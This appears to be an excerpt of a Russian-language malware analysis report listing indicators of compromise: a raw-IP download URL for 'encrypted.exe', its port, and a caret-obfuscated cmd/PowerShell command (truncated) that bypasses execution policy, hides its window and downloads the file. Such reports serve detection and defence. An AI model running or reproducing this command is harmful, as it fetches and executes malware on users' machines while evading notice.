Техническая информация
- http://81.4.122.120/encrypted.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^ErSheLl.^E^xE^ -Exe^C^UTi^oN^P^oLIcy b^yPA^sS -^n^OP^rO^fIlE -W^i^nD^O^W^S^tyle Hi^d^Den ^(ne^W-O^b^j^ECT^ Sy^st^Em.^nE^T.wE^B^cLiEN^T^).^dOWn^lo^AdFile('http://81.4.122.120/e...
- '81.#.122.120':80
- http://81.#.122.120/encrypted.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^ErSheLl.^E^xE^ -Exe^C^UTi^oN^P^oLIcy b^yPA^sS -^n^OP^rO^fIlE -W^i^nD^O^W^S^tyle Hi^d^Den ^(ne^W-O^b^j^ECT^ Sy^st^Em.^nE^T.wE^B^cLiEN^T^).^dOWn^lo^AdFile('http://81.4.122.120/e...' (со скрытым окном)